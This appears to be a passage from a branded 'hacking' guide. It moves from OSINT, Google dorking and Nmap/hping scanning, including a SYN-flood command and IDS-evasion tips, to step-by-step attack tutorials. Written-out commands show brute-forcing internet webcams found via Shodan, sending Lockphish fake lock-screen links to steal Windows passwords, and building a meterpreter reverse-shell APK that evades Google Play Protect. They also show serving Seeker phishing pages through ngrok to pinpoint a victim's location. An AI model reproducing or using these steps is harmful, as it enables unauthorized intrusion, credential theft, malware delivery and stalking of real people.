
Use the Netcraft tool to determine the OSes in use by the target organization. Use SHODAN search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Censys, https://www.censys.io/

COLLECT LOCATION INFORMATION  

Use Google Earth tool to get the physical location of the target. Tools for finding the geographical location: o Google Earth o Google Maps o Wikimapia o National Geographic Maps o Yahoo Maps o Bing Maps

PEOPLE SEARCH: SOCIAL NETWORKING SITES/PEOPLE SEARCH SERVICES   

Social networking sites are the great source of personal and organizational information. Information about an individual can be found at various people search websites. The people search returns the following information about a person or organization: o Residential addresses and email addresses o Contact numbers and date of birth o Photos and social networking profiles o Blog URLs o Satellite pictures of private residencies o Upcoming projects and operating environment

19 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER PEOPLE SEARCH ONLINE SERVICES            

Pipl Truthfinder US Search BeenVerified Spokeo PeekYou Intelius Instant Checkmate PeopleFinder Whitepages Facebook LinkedIn

GATHER INFORMATION FROM FINANCIAL SERVICES Financial services provides a useful information about the target company such as the market value of a company's shares, company profile, competitor details, etc.  

Google Finance Yahoo! Finance

FOOTPRINTING THROUGH JOB SITES  

You can gather company's infrastructure details job postings. Look for these: o Job requirements o Employee's profile o Hardware information o Software information

MONITORMING TARGET USING ALERTS  

Alerts are the content monitoring services that provide up-to-date information based on your preference usually via email or SMS in an automated manner. Examples of Alert Services: o Google Alerts - http://www.google.com/alerts o Yahoo! Alerts - http://alerts.yahoo.com o Twitter Alerts - https://twitter.com/alerts o Giga Alert - http://www.gigaalert.com

INFORMATION GATHERING USING GROUPS, FORUMS, AND BLOGS  

Groups, forums, and blogs provide sensitive information about a target such as public network information, system information, personal information, etc. Register with fake profiles in Google groups, Yahoo groups, etc. and try to join the target organization's employee groups where they share personal and company information. 20 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

FOOTPRINTING USING ADVANCED GOOGLE HACKING TECHNIQUES   

Query String: Google hacking refers to creating complex search queries in order to extract sensitive or hidden information. Vulnerable Targets: It helps attackers to find vulnerable targets. Google Operators: It uses advanced Google search operators to locate specific strings of text within the search results.

GOOGLE ADVANCE SEARCH OPERATORS Google supports several advanced operators that help in modifying the search:         

[cache:] Displays the web pages stored in the Google cache [link:] Lists web pages that have links to the specified web page [related:] Lists web pages that are similar to a specified web page [info:] Presents some information that Google has about a particular web page [site:] Restricts the results to those websites in the given domain [allintitile:] Restricts the results to those websites with all of the search keywords in the title [intitle:] Restricts the results to documents containing the search keyword in the title [allinurl:] Restricts the results to those with all of the search keywords in the URL [inurl:] Restricts the results to documents containing the search keyword in the URL

GOOGLE HACKING DATABASES  

Google Hacking Database (GHDB): http://www.hackersforcharity.org Google Dorks: http://www.exploit-db.com

INFORMATION GATHERING USING GOOGLE ADVANCED SEARCH   

Use Google Advanced Search option to find sites that may link back to the target company's website. This may extract information such as partners, vendors, clients, and other affiliations for target website. With Google Advanced Search option, you can search web more precisely and accurately

21 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

FOOTPRINTING THROUGH SOCIAL NETWORKING SITES COLLECT INFORMATION THROUGH SOCIAL ENGINEERING ON SOCIAL NETWORKING SITES  





Attackers use social engineering trick to gather sensitive information from social networking websites such as Facebook, MySpace, LinkedIn, Twitter, Pinterest, Google+, etc. Attackers create a fake profile on social networking sites and then use the false identity to lure the employees to give up their sensitive information. o fake id generator Employees may post personal information such as date of birth, educational and employment backgrounds, spouses names, etc. and information about their company such as potential clients and business partners, trade secrets of business, websites, company's upcoming news, mergers, acquisitions, etc. Attackers collect information about employee's interests by tracking their groups and then trick the employee to reveal more information.

INFORMATION AVAILABLE ON SOCIAL NETWORKING SITES

HUNT DOWN SOCIAL MEDIA ACCOUNTS BY USERNAMES WITH SHERLOCK Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It requires Python 3.6 or higher and works on MacOS, Linux and Windows. 

https://sherlock-project.github.io/

22 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

WEBSITE FOOTPRINTING  







Website Footprinting referes to monitoring and analyzing the target organization's website for information. Browsing the target website may provide: o Software used and its version o Operating system used o Sub-directories and parameters o Filename, path, database field name, or query o Scripting platform o Contact details and CMS details Use Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebug, etc. to view headers that provide: o Connection status and content-type o Accept-Ranges o Last-Modified information o X-Powered-By information o Web server in use and its version Examining HTML source provide: o Comments in the source code o Contact details of web developer or admin o File system structure o Script type Examining cookies may provide: o Software in use and its behavior o Scripting platforms used

WEBSITE FOOTPRINTING USING WEB SPIDERS  

Web spiders perform automated searches on the target websites and collect specified information such as employee names, email addresses, etc. Attackers use the collected information to perform further footprinting and social engineering attacks. o GSA Email Spider: http://email.spider.gsa-online.de o Web Data Extractor: http://webextractor.com

MIRRORING ENTIRE WEBSITE 



Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding directory structure and other valuable information from the mirrored copy without multiple requests to web server. Web mirroring tools allow you to download a website to a local directory, building recursively all directories, HTML, images, flash, videos, and other files from the server to your computer. o wget -m o HTTrack Web Site Copier: http://www.httrack.com o SurfOffline: http://www.surfoffline.com

EXTRACT WEBSITE INFORMATION 

from http://www.archive.org Internet Archive's Wayback Machine allows you to visit archived websites. o google cache: 23 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

EMAIL FOOTPRINTING GATHER E-MAIL ACCOUNTS, SUBDOMAINS, HOSTS, EMPLOYEE NAMES The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization. 

theHarvester - https://github.com/laramies/theHarvester

TRACKING EMAIL COMMUNICATIONS        

Email tracking is used to monitor the delivery of emails to an intended recipient. Attackers track emails to gather information about a target recipient in order to perform social engineering and other attacks. Get recipient's system IP address Geolocation of the recipient When the email was received and read Whether or not the recipient visited any links sent to them Get recipient's browser and operating system information Time spent on reading the emails

COLLECTING INFORMATION FROM EMAIL HEADER

EMAIL TRACKING TOOLS   

eMailTrackerPro: http://www.emailtrackerpro.com PoliteMail: http://www.politemail.com Email Lookup - Free Email Tracker: http://www.ipaddresslocation.org 24 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

WHOIS FOOTPRINTING WHOIS LOOKUP  

 

WHOIS databases are maintained by Regional Internet Registries and contain the personal information of domain owners. WHOIS query returns: o Domain name details o Contact details of domain owner o Domain name servers o NetRange o When a domain has been created o Expiry records o Records last updated Information obtained from WHOIS database assists an attacker to: o Gather personal information that assists to perform social engineering Regional Internet Registries (RIRs): o AFRINIC (African Network Information Center) o ARIN (American Registry for Internet Numbers) o APNIC (Asia Pacific Network Information Center) o RIPE (Reseaux IP Europeens Network Coordination Centre) o LACNIC (Latin American and Caribbean Network Information Center)

Browse given URL http://whois.domaintools.com in browser and type any domain name. For example: let’s search pentestlab.in

25 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

DNS FOOTPRINTING EXTRACTING DNS INFORMATION   

Attacker can gather DNS information to determine key hosts in the network and can perform social engineering attacks. DNS records provide important information about location and type of servers. DNS Interrogation Tools: o https://www.whatsmydns.net/ o https://dnsinspect.com/  Name -> IP  IP -> Name o Service -> Name o Linux host command o GET dns.google.com o Dnsdumpster

PERFORM A REVERSE DNS LOOKUP A Reverse DNS (Domain Name System) Lookup is merely the opposite sequence of a DNS lookup. Moreover, with a normal DNS lookup, you query the DNS or hostname to get the IP address. To clarify, with a Reverse DNS Lookup, you query the IP address to find the hostname. Therefore, by entering the IP address into the Reverse DNS Lookup Tool, you are able to find the domain name associated with the corresponding IP. Numerous online tools can be used to perform an rDNS lookup. A few examples of these online tools are linked below:   

MXToolbox.com Whatismyip.com IPLocation.net

You can also perform a rDNS lookup manually from the command line. In Linux, the command you would use is “dig” with the added “-x” flag. If you are on a Windows computer, you would typically use the “nslookup” command, though you could also use “ping a”.

26 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

NETWORK FOOTPRINTING LOCATE THE NETWORK RANGE   

Network range information assists attackers to create a map of the target network. Find the range of IP addresses using ARIN whois database search tool. You can find the range of IP addresses and the subnet mask used by the target organization from Regional Internet Registry (RIR).

TRACEROUTE 

Traceroute programs work on the concept of ICMP protocol and use the TTL field in the header of ICMP packets to discover the rotuers on the path to a target host. o Manual traceroute: ping -i 1 o UDP 33434-33534 Random o ICMP type3: Destination Unreachable o ICMP type11: Time Exceeded

TRACEROUTE ANALYSIS  



Attackers conduct traceroute to extract information about: network topology, trusted routers, and firewall locations. For example: after running several traceroutes, an attacker might obtain the following information: o traceroute 1.10.10.20, second to last hop is 1.10.10.1 o traceroute 1.10.10.20, third to last hop is 1.10.10.1 o traceroute 1.10.20.10, second to last hop is 1.10.10.50 o traceroute 1.10.20.15, third to last hop is 1.10.10.1 o traceroute 1.10.20.15, second to last hop is 1.10.10.50 By putting this information together, attackers can draw the network diagram.

TRACEROUTE TOOL    

https://www.ultratools.com/tools/traceRoute https://www.uptrends.com/tools/traceroute https://tools.keycdn.com/traceroute https://ping.eu/traceroute/

27 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

FOOTPRINTING TOOLS 











Recon-ng o Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Maltego o Maltego is software used for open-source intelligence and forensics, developed by Paterva from Pretoria, South Africa. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining. FOCA o FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages, and can be downloaded and analysed with FOCA. OSRFramework o OSRFramework is a GNU AGPLv3+ set of libraries developed by i3visio to perform Open Source Intelligence collection tasks. They include references to a bunch of different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction and many others. At the same time, by means of ad-hoc Maltego transforms, OSRFramework provides a way of making these queries graphically as well as several interfaces to interact with like OSRFConsole or a Web interface. BillCipher o Information Gathering tool for a Website or IP address, use some ideas from Devploit. BillCipher can work on any operating system if they have and support Python 2, Python 3, and Ruby. OSINT Framework o OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

28 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

NETWORK SCANNING  

Network scanning refers to a set of procedures for identifying hosts, ports, and services in a network. Network scanning is one of the components of intelligence gathering an attacker uses to create a profile of the target organization. o Objectives of Network Scanning: o To discover live hosts, IP address, and open ports of live hosts o To discover operating systems and system architecture o To discover services running on hosts o To discover vulnerabilities in live hosts

TCP COMMUNICATION FLAGS      

URG (Urgent): Data contained in the packet should be processed immediately FIN (Finish): There will be no more transmissions RST (Reset): Resets a connection PSH (Push): Send all buffered data immediately ACK (Acknowledgement): Acknowledges the receipt of a packet SYN (Synchronize): Initiates a connection between hosts

TCP/IP COMMUNICATION

CREATING CUSTOM PACKET USING TCP FLAGS  

Colasoft Packet Builder enables creating custom network packet to audit networks for various attacks. Attackers can also use it to create fragmented packets to bypass firewalls and IDS systems in a network.

29 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

CHECK FOR LIVE SYSTEMS CHECKING FOR LIVE SYSTEMS - ICMP SCANNING  

Ping scan involves sending ICMP ECHO requests to a host. If the host is live, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if ICMP is passing through a firewall.

PING SWEEP   

Ping sweep is used to determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts. If a host is live, it will return an ICMP ECHO reply. Attackers calculate subnet masks using Subnet Mask Calculators to identify the number of hosts present in the subnet. Attackers then use ping sweep to create an inventory of live systems in the subnet.

PING SWEEP TOOLS  

Angry IP Scanner pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc. SolarWinds Engineer Toolset's Ping Sweep enables scanning a range of IP addresses to identify which IP addresses are in use and which ones are currently free. It also performs reverse DNS lookup.

30 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

CHECK FOR OPEN PORTS SSDP SCANNING   

The Simple Service Discovery Protocol (SSDP) is a network protocol that works in conjunction with UPnP to detect plug and play devices available in a network. Vulnerabilities in UPnP may allow attackers to launch Buffer overflow or DoS attacks. Attacker may use UPnP SSDP M-SEARCH information discovery tool to check if the machine is vulnerable to UPnP exploits or not. o SSDP uses UDP transport protocol on port 1900 o Host: 239.255.255.250:1900

SCANNING IN IPV6 NETWORKS     

IPv6 increases the IP address size from 32 bits to 128 bits, to support more levels of addressing hierarchy. Traditional network scanning techniques will be computationally less feasible due to larger search space (64 bits of host address space or 2^64 addresses) provided by IPv6 in a subnet. Scanning in IPv6 network is more difficult and complex than the IPv4 and also some scanning tools do not support ping sweeps on IPv6 networks. Attackers need to harvest IPv6 addresses from network traffic, recorded logs or Received from: and other header lines in archived email or Usenet news messages. Scanning IPv6 network, however, offers a large number of hosts in a subnet if an attacker can compromise one host in the subnet; attacker can probe the "all hosts" link local multicast address.

SCANNING TOOL: NMAP  

Network administrators can use Nmap for network inventory, managing service upgrade schedules, and monitoring host or service uptime. Attacker uses Nmap to extract information such as live hosts on the network, services (application name and version), type of packet filters/firewalls, operating systems and OS versions.

31 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER HPING2/HPING3  

Command line network scanning and packet crafting tool for the TCP/IP protocol. It can be used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, etc..

HPING COMMANDS          

ICMP Ping: hping3 -1 10.0.0.25 ACK scan on port 80: hping3 -A 10.0.0.25 -p 80 UDP scan on port 80: hping3 -2 10.0.0.25 -p 80 Collecting Initial Sequence Number: hping3 192.168.1.103 -Q -p 139 -s Firewalls and Time Stamps: hping3 -S 72.14.207.99 -p 80 --tcp-timestamp SYN scan on port 50-60: hping3 -8 50-60 -S 10.0.0.25 -V FIN, PUSH and URG scan on port 80: hping3 -F -P -U 10.0.0.25 -p 80 Scan entire subnet for live host: hping3 -1 10.0.1.x --rand-dest -I eth0 Intercept all traffic containing HTTP signature: hping3 -9 HTTP -I eth0 SYN flooding a victim: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 –flood

SCANNING TECHNIQUES 



Scanning TCP Network Services: o Open TCP Scanning Methods  TCP Connect / Full Open Scan o Stealth TCP Scanning Methods  Half-open Scan  Inverse TCP Flag Scanning  Xmas Scan  FIN Scan  NULL Scan  ACK Flag Probe Scanning o Third Party and Spoofed TCP Scanning Methods  IDLE / IP ID Header Scanning Scanning UDP Network Services: o UDP Scanning 32 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER TCP CONNECT / FULL OPEN SCAN (-ST)   

TCP Connect scan detects when a port is open by completing the three-way handshake. TCP Connect scan establishes a full connection and tears it down by sending a RST packet. It does not require super user privileges.

STEALTH SCAN (HALF-OPEN SCAN) (-SS)   

Stealth scan involves resetting the TCP connection between client and server abruptly before completion of three-way handshake signals making the connection half open. Attackers use stealth scanning techniques to bypass firewall rules, logging mechanism, and hide themselves as usual network traffic. Stealth Scan Process: 1. The client sends a single SYN packet to the server on the appropriate port. 2. If the port is open then the server responds with a SYN/ACK packet. 3. If the server responds with an RST packet, then the remote port is in the "closed" state. 4. The client sends the RST packet to close the initiation before a connection can ever be established.

33 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER INVERSE TCP FLAG SCANNING (-SF, -SN) 

Attackers send TCP probe packets with a TCP flag (FIN, URG, PSH) set or with no flags, no response means port is open and RST means the port is closed. Note: Inverse TCP flag scanning is known as FIN, URG, PSH scanning based on the flag set in the probe packet. It is known as null scanning if there is no flag set.

XMAS SCAN (-SX)   

In Xmas scan, attackers send a TCP frame to a remote device with FIN, URG, and PUSH flags set. FIN scan works only with OSes with RFC 793-based TCP/IP implementation. It will not work against any current version of Microsoft Windows.

ACK FLAG PROBE SCANNING (-SA)  



Attackers send TCP probe packets with ACK flag set to a remote device and then analyzes the header information (TTL and WINDOW field) of received RST packets to find whether the port is open or closed. TTL based ACK flag probe scanning: o If the TTL value of RST packet on particular port is less than the boundary value of 64, then that port is open. WINDOW based ACK flag probe scanning: o If the WINDOW value of RST packet on particular port has non zero value, then that port is open.

34 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

 

ACK flag probe scanning can also be used to check the filtering system of target. Attackers send an ACK probe packet with random sequence number, no response means port is filtered (stateful firewall is present) and RST response means the port is not filtered.

IDLE/IPID Header Scan (-sI)      

Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on port 25. Port is considered "open" if an application is listening on the port. One way to determine whether a port is open is to send a "SYN" (session establishment) packet to the port. The target machine will send back a "SYN|ACK" (session request acknowledgement) packet if the port is open, and an "RST" (Reset) packet if the port is closed. A machine that receives an unsolicited SYN|ACK packet will respond with an RST. An unsolicited RST will be ignored. Every IP packet on the Internet has a "fragment identification" number (IPID). OS increments the IPID for each packet sent, thus probing an IPID gives an attacker the number of packets sent since last probe.

35 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER IDLE SCAN: STEP 1/2/3 Step 1:    

Send SYN+ACK packet to the zombie machine to probe its IPID number. Every IP packet on the Internet has a fragment identification number (IPID), which increase every time a host sends IP packet. Zombie not expecting a SYN+ACK packet will send RST packet, disclosing the IPID. Analyze the RST packet from zombie machine to extract IPID.

Step 2:   

Send SYN packet to the target machine (port 80) spoofing the IP address of the "zombie". If the port is open, the target will send SYN+ACK Packet to the zombie and in reponse zombie sends RST to the target. If the port is closed, the target will send RST to the "zombie" but zombie will not send anything back.

Step 3: 

Probe "zombie" IPID again

UDP SCANNING (-SU) 



UDP Port Open: o There is no three-way TCP handshake for UDP scan o The system does not respond with a message when the port is open. UDP Port Closed: o If a UDP packet is sent to closed port, the system responds with ICMP port unreachable message o Spywares, Trojan horses, and other malicious application use UDP ports. 36 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER SCANNING TOOL: NETSCAN TOOLS PRO  

Network Tools Pro assists in troubleshooting, diagnosing, monitoring and discovering devices on the network. It lists IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automatically or with manual tools.

PORT SCANNING COUNTERMEASURES        

Configure firewall and IDS rules to detect and block probes. Run the port scanning tools against hosts on the network to determine whether the firewall properly detects the port scanning activity. Ensure that mechanism used for routing and filtering at the routers and firewalls respectively cannot be bypassed using particular source ports or source-routing methods. Ensure that the router, IDS, and firewall firmware are updated to their latest releases. Use custom rule set to lock down the network and block unwanted ports at the firewall. Filter all ICMP messages (i.e. inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers. Perform TCP and UDP scanning along with ICMP probes against your organization's IP address space to check the network configuration and its available ports. Ensure that the anti scanning and anti spoofing rules are configured.

37 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

SCANNING BEYOND IDS IDS EVASION TECHNIQUES    

Use fragemented IP packets. Spoof your IP address when launching attacks and sniff responses from server. Use source routing (if possible). Connect to proxy servers or compromised trojaned machine to launch attacks.

SYN/FIN SCANNING USING IP FRAGMENTS (-F)  

It is not a new scanning method but a modification of the earlier methods. The TCP header is split into several packets so that the packet filters are not able to detect what the packets intend to do.

38 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW HACKERS HACK WEBCAM USING ENTROPY AND SHODAN Hacking Webcams and cameras is one of the most searched things on the internet. I mean almost every hacker wants to hack webcams and cameras as they give the most sensitive information and with the correct method, eventually they hack computer/ Laptop webcams using various methods, for example, hacking with entropy. Our systems are always connected to the internet and not many people use the camera cover hence vulnerable to hacking. Negligence in Computer security is a boon for hacking webcam for hackers. It is important to use the camera privacy filter to stay safe. So in this tutorial, we will show you how hackers can hack webcams and how you can protect yourself from such a camera hacks: HACKING WEBCAMS USING ENTROPY Step 1; The first step is to download the Entropy Toolkit with the following command on Kali Linux git clone https://github.com/entynetproject/entropy Step 2: After downloading, you need to open the folder. Now give it the executable access that it needs with the following command: cd entropy chmod +x install.sh ./install.sh Step 3: Now that we have given the execution permissions lets run the tool using the following command: entropy

Step 4: Here are all the list of commands you can use in Entropy

39 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Step 5: Now to start hacking webcams we need some basic info such as IP address and port number which can be found using Shodan.

Suppose the IP and port number is 192.168.1.100:80 Then the command will be as follows: entropy -b 1 -i 192.168.1.100:80 -v This command will start trying to hack the webcam with the following IP Address. 40 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Now if you want to hack multiple webcams then you can a text file with the list of IP’s and port numbers as shown in the following command: entropy -b 2 -l iplist.txt -v Here the file iplist has all the list of webcams IP addresses. You can also directly connect using Shodan API with the following command. With this command, the shodan API will start searching for vulnerable webcams around the world. entropy -b 2 -v –shodan That’s all folks. This is how hackers can hack webcams using an entropy toolkit

41 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO HACK WINDOWS LOCKSCREEN/ADMIN PASSWORD: For this hack, we will be using the Lockphish tool as a part of social engineering. We will be sending a malicious link which will socially engineer the target and capture the targets windows lock screen password: Step 1: Clone Lockphish on your kali Linux with the following command: git clone https://github.com/JasonJerry/lockphish Alternative git clone links if the above does not work: git clone https://github.com/JasonJerry/lockphish git clone https://github.com/jaykali/lockphish

Step 2: Now change directory to the lockphish folder as shown: cd lockphish Step 3: Now run lockphish with the following command: bash lockphish.sh

Step 4: Press enter to use the default youtube link or Provide the link you want the victim to be redirected to as shown below:

Step 5: Press enter and the malicious link will be automatically created as shown below:

42 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Step 6: Send this link to the victim. You can use a URL shortening tool as well to make the URL appear normal. Step 7: The victim will see a lock screen as shown below:

Step 8: When the target enters the password it will be recorded as shown below:

43 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

In this hack when we create the malicious link, that when forwarded to the victim calls a page that looks just like the windows login screen. When the victim unlocks the lock screen with his password the password is captured we can easily get access to the victim’s password as shown above. The victim thinks that their windows pc was locked when in reality it was a hack. And after entering his password on the fake page, the victim’s password will be sent to us just as shown above and you now have access to the victim’s lock screen password.

44 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW HACKERS BYPASS GOOGLE PLAY SECURITY Google Play Protect is Google Antivirus software that was developed to protect android devices. This shield is included by default on all the latest android phones who have the Google Play Store. The Play Protect blocks the install of any malicious app on android phones making the phones quite secure. Google Play Protect scans the device for malware and if any malware is detected it will warn you as shown in the image below:

HOW TO BYPASS GOOGLE PLAY PROTECT WITH APK BLEACH Step 1: Open Kali Linux and type the following commands to clone and download the apkbleach tool on your system. git clone https://github.com/graylagx2/apkbleach

Step 2: After downloading, open the Apk bleach tool folder and access the apkbleach file with the following command: cd apkbleach Now give the tool execution permission with the following Linux command: chmod +x apkbleach

Step 3: Run the APKBleach tool with the following command: ./apkbleach 45 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Now I will create my own malicious file which will bypass google play protect. ./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /root/Desktop/service.apk

After typing the above command, we wait for the tool to create a malicious file for us

After creating the malicious file, and sending it to the target victim we need to put Metasploit in listening mode and wait for the connection. As you can see in the image below the malware file was not detected by Google play protect.

And thus we have successfully bypassed Google play protect security service.

46 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO FIND OUT EXACT LOCATION OF THE PERSON USING SEEKER The below attack works if the user opens the link from their mobile phone or Desktop and allows location access. If the location access is denied then the data we get in not that accurate. But with the location on we can pinpoint the other person. With the Seeker Tool we can get the following Info:     

Device name and Operating system Device Platform and Browser Name, Version details, etc The number of processor CPU cores and RAM Capacity Screen resolution and GPU Information The public IP address as well as other data.

With location access, you can get the exact location of the device and more. HOW THE SEEKER TOOL WORKS 1. We create a phishing site, that needs location permission. You need to use social engineering and creativity for this one. You can ideas such as finding nearby dating partners etc. to ask for permission to determine the user’s location. 2. To make this really convincing we can use URL shortening tools that will send the link to the victim. 3. If the user does give us the location permission for the hack then we can find out their exact location. REQUIREMENTS:   

Kali Linux: The best os for hacking Seeker– For launching the phishing Site and analyzing the received data to find the exact location of the target. Ngrok – For creating unique links on the internet.

If you don’t have Kali Linux then you perform this hack on nethunter of termux as well. We have already shown how to install termux and nethunter on android. HOW TO INSTALL AND SETUP SEEKER IN KALI LINUX Type the following commands to install the dependencies required for Seeker. You need them installed in order to run seeker: sudo apt-get install python3 python3-pip php ssh git pip3 install requests Press Y when asked for confirmation and these dependencies will be downloaded and installed on your Kali Linux. Now install and setup the Seeker Tool by cloning the tool with the following command: git clone https://github.com/thewhiteh4t/seeker

47 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Now switch to the seeker directory by using the below command: cd seeker If you want to see all the options that come with the seeker app then type the following command: python3 ./seeker.py -h

INSTALLATION STEPS FOR NGROK IN KALI LINUX You also need to install Ngrok on your Kali Linux System in order to use the seeker tool: Type the following command to download Ngrok to your system. wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip

Now unzip the file with the following command: unzip

Now go to the Ngrok website and complete signup procedure. You can log in with your Google or Github account if you are lazy like me. Just make your free account. It’s free to use and has more premium features if you are willing to pay. 48 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

After signup, you will see your auth token at the Ngrok website as shown in the image below: Now give below command with your Auth Token ./ngrok authtoken

The above command will add your auth token to your ngrok.yml file and you will see the output as shown below: Now allow Ngrok execution permission so that it can run directly from the terminal with the following command: chmod +x ./ngrok Now to check all the Ngrok options type the following: ./ngrok -h

49 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER SEEKER LOCATION TRACKING HACK To start using seeker type the following command: python3 ./seeker.py -t manual Now as seen in the image below you will see templates that you can use directly to track the location of your victims. I can see 4 templates. More may be added in the future.

Now for this hack, I am choosing The near You template. We will show you the rest in order. Don’t worry: Then following information will be displayed.    

[+] Loading NearYou Template… [+] Port : 8080 [+] Starting PHP Server……[ Success ] [+] Waiting for User Interaction.

Now, you need to create a tunnel from the Internet to our local server, in another window, using Ngrok. To do this type the following command : ./ngrok http 8080

50 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Make sure to use 8080 and not 80 as suggested by Ngrok. You need to use the one that works well with the seeker. Now the link will be generated and will be something like this: https://10f34f608fb4.ngrok.io Now, this link must be sent to the victim. You can use a service such as bitly so shorten the url and make it look like any other URL. A desktop user will see the following:

The page looks decent and has animation. You can improve it further if you know to code. You can directly edit the near you HTML file and add your own content. The inscriptions indicate that this service will allow you to find people near you and make new friends. If the user clicks the continue button as shown below they will see the following request. If they accept it you get their exact location:

The accurate location data tracked and all the data file generated containing all the location info. It works better for mobiles rather than desktops since mobile has higher accuracy GPS tracking. For convenience, a link to Google maps also given which can directly take to the victim’s location.

51 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

You can also use the Gdrive template which simply makes the page seem like a Google drive page. Whatsapp template is the same. Since everyone likes WhatsApp we will show you how to use the WhatsApp template for tracking location: We will do an alternate method without Ngrok as well since we like to teach more things: Type the following command: python3 ./seeker.py Now select the Whatsapp template. A WhatsApp+ Serveo URL will be generated as shown below:

You need to provide a group name and the image location to use as the group icon. Refer the image below for how to show that:

52 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Now when you visit the WhatsApp link you will see the following output on your phone: Click on the image join option and you will see the location request. The location request and help you track the exact location of the target just like the first case.

Your location data will be available as shown below:

53 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW HIDE DATA FILES IN IMAGES USING STEGHIDE HOW TO ENCRYPT FILES USING STEGANOGRAPHY IN KALI LINUX Step 1: Open a Kali Linux Terminal and clone the steghide repository apt-get install steghide Step 2: Download an image file in which we will hide out text files inside of it. Step 3: In the Kali Linux terminal. Change the working directory to Desktop using the following command: cd Desktop Step 4: Make sure that both the files i.e JPG Image file and the text file in the same working directory. In this tutorial, the directory used is Desktop. You can choose any.

I have downloaded an image of a girl. The file is named girl.jpg. The text file is secret.txt Step 5: Type steghide or steghide -h to show all the option of steghide Step 6: Now type the following commands to embed the text File into the Image File with a password

steghide embed -cf girl.jpg -ef secret.txt The help section describes each command you can use in steghide. Step 7: Now Steghide will give you option to enter a Passphrase/password. So you can enter any password you like, then re-enter the same passphrase to confirm and hit enter. You will get the following output on your terminal.

54 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

